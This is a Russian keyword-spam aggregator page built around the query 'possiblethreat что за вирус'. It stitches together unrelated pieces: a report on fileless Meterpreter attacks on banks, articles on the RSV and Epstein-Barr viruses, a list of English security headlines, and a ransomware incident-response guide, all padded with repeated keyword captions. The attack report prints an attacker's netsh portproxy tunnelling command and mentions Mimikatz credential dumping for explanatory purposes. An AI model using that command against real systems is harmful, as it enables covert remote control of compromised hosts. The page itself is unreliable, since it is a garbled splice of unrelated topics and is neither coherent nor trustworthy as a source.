possiblethreat что за вирус

«Невидимая» малварь не оставляет файлов, прячется в памяти и атакует крупные компании

Linux для хакера

Исследователи «Лаборатории Касперского» представили отчет о новой, интересной вредоносной кампании, от которой пострадали банки, телекомы, правительственные агентства, а также другие компании и организации более чем в сорока странах мира.

Аналитики команды GReAT пишут, что первыми угрозу заметили специалисты банковской команды безопасности: тогда в физической памяти контроллера домена был найден код Meterpreter. Продукты «Лаборатории Касперского» распознают такие проблемы как MEM:Trojan.Win32.Cometer и MEM:Trojan.Win32.Metasploit. Когда аналитики стали разбираться, пытаясь понять, откуда в памяти взялся код, они также обнаружили PowerShell-скрипты в реестре Windows, и утилиту NETSH, которая использовалась для туннелирования трафика на управляющий сервер атакующих.

Такие атаки называются «безфайловыми» (fileless), то есть вредонос не размещает никаких файлов на жестком диске, вместо этого пейлоад внедряется непосредственно в память и существует внутри RAM. Разумеется, обнаружить и отследить такую атаку крайне трудно.

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирусСхема атаки

Исследователи объясняют, что широко известный фреймворк Metasploit может использоваться для создания скриптов, как на примере ниже.

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

Когда скрипт сгенерирован, атакующие используют Windows SC для установки вредоносного сервиса на целевой хост (в итоге будет выполнен вышеприведенный скрипт). Это можно провернуть, к примеру, при помощь такой команды:

Следующий шаг – настройка туннелирования, чтобы зараженная машина стала доступна удаленному хосту. Для этого злоумышленники прибегают к такой команде:

netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.10.1.12 connectport=8080 listenaddress=0.0.0.0

В результате весь сетевой трафик с 10.10.1.11:4444 будет перенаправлен на 10.10.1.12:8080. Данная техника позволяет установить прокси-тоннель, с помощью которого преступники смогут удаленно контролировать зараженный PowerShell хост.

Аналитики отмечают, что использование SC и NETSH требует привилегий администратора на локальном и удаленном хосте. Использование вредоносных PowerShell-скриптов тоже потребует эскалации привилегий и изменений в execution policy. Для этого злоумышленники прибегают к помощи дампера учетных данных Mimikatz, собирая пароли от аккаунтов на локальной машине и окружающих рабочих станциях.

Суммируя все перечисленное (использование Metasploit и стандартных утилит Windows, домены без WHOIS-информации), исследователи делают вывод, что почерк неизвестных злоумышленников очень похож на работу таких групп, как GCMAN и Carbanak. Никаких прямых улик, тем не менее, нет, так что связать эти тихие атаки с какой-либо конкретной группировкой не представляется возможным.

«Техники, подобные описанным в этом отчете, становятся все более распространенными, особенно [когда атаки осуществляются] против крупных целей в банковской индустрии. К сожалению, использование простых инструментов, в сочетании с различными уловками, делают обнаружение [таких атак] крайне сложным», — резюмируют эксперты GReAT.

Источник

Эксперт объяснил, насколько опасен вирус RSV и как от него защититься

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

Насколько опасен этот вирус, велика ли угроза попадания его в Россию, и как защититься от этой инфекции, «Российской газете» рассказал заслуженный врач России, ведущий научный редактор сервиса дистанционного обучения медработников Vrachu.ru Михаил Каган.

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

— С начала пандемии новой коронавирусной инфекции общественная деятельность была ограничена во всем мире. Были введены и затем усилены меры инфекционного контроля, включая мытье рук, ношение масок и соблюдение социальной дистанции. Эти меры значительно снизили распространенность острых респираторных вирусных инфекций, отличных от COVID-19, таких как грипп, респираторно-синцитиальная вирусная инфекция (RSV) и других.

В развитых странах RSV диагностируется у 18-33% госпитализированных детей с инфекциями нижних дыхательных путей. Чаще всего эта инфекция у детей и взрослых проявляется симптомами заболеваний верхних дыхательных путей в форме ринита, фарингита, ларингита. Более тяжелое течение характерно для детей грудного возраста. У детей раннего возраста, нуждающихся в госпитализации, инфекция проявляется острым бронхиолитом и пневмонией. Иногда может принимать опасное для жизни течение у недоношенных детей, у детей с врожденной бронхолегочной дисплазией, у детей с тяжелыми врожденными пороками сердца. При тяжелом протекании этой инфекции требуются дополнительная кислородная поддержка и, в ряде случаев, искусственная вентиляции легких.

Очевидно, что пандемия COVID-19 нарушила характерную для RSV сезонность. Поставленный в трудные условия необходимости выживания вирус способен приспособиться и вновь заявить о себе, воспользовавшись снижением за время затишья количества людей, имеющих к нему иммунитет.

Вспышка RSV, возникшая сейчас в ряде стран, может произойти и в России, что увеличит и без того высокую нагрузку на систему здравоохранения и вызовет серьезные дополнительные проблемы на фоне продолжающейся пандемии.

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

Поскольку RSV и COVID-19 имеют схожие симптомы, отличить их можно только с помощью ПЦР-тестирования.

Источник

PossibleThreat Articles

Articles for the experts…

What to Do About Log4j

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

Credit to Author: William Malik| Date: Tue, 21 Dec 2021 00:00:00 +0000

Learn more about some tactical measures people are already taking, and some strategic guidance for what to do after the immediate crisis abates.

Apache’s other product: Critical bugs in ‘httpd’ web server, patch now!

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

Credit to Author: Paul Ducklin| Date: Tue, 21 Dec 2021 17:57:39 +0000

The Apache web server just got an update – this one is nothing to do with Log4j!

Police forces pipe 225 million pwned passwords into ‘Have I Been Pwned?’

Credit to Author: Pieter Arntz| Date: Tue, 21 Dec 2021 15:16:52 +0000

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус
Law enforcement agencies like the FBI and NCA have injected hundreds of millions of unique passwords into Have I Been Pwned.

Attackers test “CAB-less 40444” exploit in a dry run

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

Credit to Author: Andrew Brandt| Date: Tue, 21 Dec 2021 12:30:29 +0000

An updated exploit takes a circuitous route to trigger a Word document into delivering an infection without using macros

How to detect Apache HTTP Server Exploitation

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

Credit to Author: Nitesh Surana| Date: Tue, 21 Dec 2021 00:00:00 +0000

With recent news of the critical, zero-day vulnerability Apache Log4Shell, we explore how to detect and protect your Apache HTTP servers.

2022 Cybersecurity Trends for DevSecOps

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус
Trying to adopt DevSecOps culture? Or already in the thick of it? Trend Research explores the cybersecurity trends for 2022 to enhance your security strategy and get the most out of DevSecOps.

Logjam: Log4j exploit attempts continue in globally distributed scans, attacks

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

Credit to Author: gallagherseanm| Date: Mon, 20 Dec 2021 19:39:28 +0000

China and Russia, Kinsing miner botnet dominate sources of exploit attempts.

What’s all the fuss with Log4j2?

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

If you’re a Windows user tracking various tech and security websites, you’ve probably read about the Log4j2 vulnerability that’s taken the internet by storm, literally and figuratively. While large firms have application developers that know what code they’ve used — and thus authoritatively know where their firm may be vulnerable — what if you are a smaller company without such resources? (Or what if you’re a home user wondering whether you need to be concerned?)

Everything you always wanted to know about NFTs (but were too afraid to ask): Lock and Code S02E24

Credit to Author: Malwarebytes Labs| Date: Mon, 20 Dec 2021 17:22:56 +0000

Источник

Чем опасен вирус Эпштейна-Барр?

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

Чем опасен вирус Эпштейна-Барр?

Вирус Эпштейна-Барр относится к семейству герпесвирусов (герпес 4-го типа). Это возбудитель, который вызывает множество различных заболеваний, самый частым из которых является Инфекционный мононуклеоз

С этим вирусом связывают происхождение многих онкологических заболеваний. Источник заражения-человек с клиническими проявлениями болезни. Путь передачи – контактный, со слюной либо с кровью ВЭБ передается преимущественно воздушно-капельным путём, проникает в эпителий слизистой ротоглотки и слюнные железы человека.

Инфицирование происходит при поцелуях, обменах едой или напитками, пользование общей посудой, предметами личной гигиены и игрушками. Реже заражение происходит при переливании крови, пересадке органов, при половых контактах (через сперму).

ВЭБ вызывает поражения многих органов и систем, что особенно часто проявляется у людей с иммунными дефицитом

Заболевания, причиной которых является вирус Эпштейна-Барр:

ВЭБ – ассоциированные опухоли (карцинома носоглотки, Т-клеточные лимфомы)

Поражение других органов. Сюда относятся пневмонии, миокардит, панкреатит.

Диагностика инфекции. Вызываемых ВЭБ осуществляется чаще врачами терапевтами, педиатрами и инфекционистами. Уточняются близкие контакты с маленькими детьми, нахождение в дошкольно-школьных учреждениях, эпизоды нарушения правил гигиены, предыдущие схожие симптомы у пациентов либо в семье.

Важную роль в диагностике занимают лабораторные исследования

Биохимические параметры (общий билирубин, алат, аст и щелочная фосфотаза, не редко увеличиваются в несколько раз.

Обнаружение антител к вирусу ЭБ проводится путем ИФА.

При наличии антител IgM к вирусу ЭБ – диагностируется первичная или острая, недавняя инфекция. Присутствие антител IgG свидетельствует о заболевании в прошлом сроком от нескольких месяцев до нескольких лет

В лаборатории обследование так же входит определение ДНК в крови

Еще одной опасностью ВЭБ является аутоиммунные воспаления.

При попадании ВЭБ в кровь иммунитет начинает выработку антител. Иммуноглобулины образуют с клетками ВЭБ – циркулирующие иммунные комплексы, если вовремя не блокировать процесс развития вируса, он может дорасти до лимфопролиферативных заболеваний

Источник

Что делать, если вас пошифровало

Как минимизировать последствия атаки шифровальщика для компании.

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

possiblethreat что за вирус. Смотреть фото possiblethreat что за вирус. Смотреть картинку possiblethreat что за вирус. Картинка про possiblethreat что за вирус. Фото possiblethreat что за вирус

В нашем блоге есть тысяча и одна статья про то, как защититься от той или иной заразы. Но бывает и так, что защититься не получается, и зараза просачивается внутрь периметра. Некоторые в этот момент начинают паниковать — а надо, напротив, сохранять трезвый рассудок и действовать максимально быстро и осознанно. Собственно, ваши действия определят, станет ли этот инцидент гигантской проблемой для компании или еще одной успешно решенной задачей. Давайте выясним, что и как делать, на примере заражения шифровальщиком.

Часть первая: ищем и изолируем

Итак, зловред проник в вашу сеть, и вы об этом уже знаете. Но он может быть далеко не на одной машине и даже не в одном офисе. Так что первым делом ищите зараженные компьютеры и сегменты сети в инфраструктуре предприятия и изолируйте их от остальной сети, чтобы зловред не зацепил другие.

Как искать? Если машин мало, то посмотрите в логи антивирусов, в EDR и файрволы. Как вариант — буквально пройдитесь от машины к машине ногами и проверьте, как там дела. Если компьютеров много, то проще и удобнее анализировать события и логи в SIEM-системе. Походить потом все равно придется, но лучше сначала получить общее представление.

При этом не стоит забывать, что в пылу сражения с шифровальщиком важно не уничтожить улики, иначе потом будет сложно отследить, откуда он взялся, и понять, где искать другие инструменты группировки, которая атаковала ваши компьютеры. В общем, берегите логи и прочие следы зловредов на компьютерах, они вам еще пригодятся.

После того как вы изолировали зараженные машины от сети, лучше всего снять с них образы дисков и больше не трогать до окончания расследования. Если простой компьютеров невозможен, все равно сделайте образы и сохраните дамп памяти — он тоже может пригодиться в расследовании. Также не забывайте документировать все свои действия: это нужно для того, чтобы максимально прозрачно и честно рассказывать о происходящем как сотрудникам, так и всему миру. Но об этом позже.

Часть вторая: зачищаем и действуем

После проверки периметра у вас будет список машин с дисками, полными зашифрованных файлов, а также образы этих дисков. Все машины уже отключены от сети и больше не представляют угрозы. Можно попытаться сразу же взяться за восстановление, но лучше, как уже было сказано выше, их пока не трогать, а заняться безопасностью всего остального хозяйства.

Для начала стоит проанализировать шифровальщика, разобраться, как он к вам попал и какие группировки обычно им пользуются, — то есть начать активно охотиться на угрозы. Скорее всего, шифровальщик появился не сам по себе, а его что-то скачало — дроппер, RAT, троян-загрузчик или что-то еще в таком духе. Это «что-то» нужно локализовать в рамках сети и выкорчевать.

Для этого проведите внутреннее расследование: покопайтесь в логах и попытайтесь понять, на каком компьютере шифровальщик появился в первую очередь и почему его там ничто не остановило. Найдите — и уничтожьте.

По итогам расследования, во-первых, зачистите сеть от сложных и особо скрытных зловредов и, если возможно, заново запустите работу бизнеса. Во-вторых, разберитесь, чего же не хватило в плане программных средств обеспечения безопасности, и устраните эти пробелы. В-третьих, обучите сотрудников, чтобы они больше не наступали на такие грабли и не скачивали опасные файлы на рабочие компьютеры. Наконец, в-четвертых, озаботьтесь своевременной установкой обновлений и патчей — пусть это будет приоритетом для IT-администраторов, поскольку часто зловреды лезут через уязвимости, для которых уже выпустили заплатки.

Часть третья: разбираемся с последствиями

На этом этапе угрозы в сети больше нет, и дыры, через которую она пролезла, тоже. Самое время вспомнить, что после инцидента остался парк неработающих компьютеров. Если для расследования они уже не нужны, то лучше отформатировать машины начисто, а потом восстановить на них данные из бэкапа, сделанного незадолго до заражения.

Если резервной копии нет, то придется пытаться расшифровать то, что есть. Зайдите на сайт No Ransom — есть шанс, что там найдется дешифратор для именно вашего шифровальщика. Если не нашелся — напишите в поддержку компании, которая предоставляет вам услуги в сфере кибербезопасности. Не исключено, что там смогут помочь.

Платить вымогателям не стоит: во-первых, незачем спонсировать криминальную деятельность, а во-вторых, шанс, что все расшифруют, далек от 100%. Еще с большой долей вероятности ваши данные не только заблокировали, но и попытались украсть — и могут угрожать их опубликовать. Это, пожалуй, самая неприятная часть, но платить выкуп все равно не надо, и вот почему. Злоумышленники по умолчанию жадные, и после того как вы заплатите, они могут захотеть еще. И уже были случаи, когда спустя пару месяцев после инцидента взломщики возвращались со словами: «Заплатите-ка побольше, а то все же опубликуем».

В общем, если что-то утекло, то считайте, что оно уже опубликовано, и отталкивайтесь в своих действиях от этого. Зашифрованные файлы, кстати, все равно не удаляйте: если декриптора нет сейчас, то есть шанс, что его сделают позже — так тоже уже бывало.

Еще об инциденте придется говорить. Причем буквально со всеми: и с сотрудниками, и с акционерами, и с госструктурами, и, скорее всего, с журналистами… Говорить лучше честно и открыто, это ценят. Неплохим примером служит инцидент у промышленного гиганта Hydro в 2019-м, когда представители регулярно публиковали доклады о том, как разбираются с последствиями инцидента, и даже провели пресс-конференцию спустя несколько часов после заражения. В любом случае PR-отдел и compliance-менеджеров ждут жаркие деньки.

Часть четвертая: лучше не доводить

Крупный киберинцидент — это всегда много суеты и головной боли. И в идеале, конечно, лучше их не допускать. Для этого надо заранее думать о том, что может пойти не так, и готовиться:

Источник

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *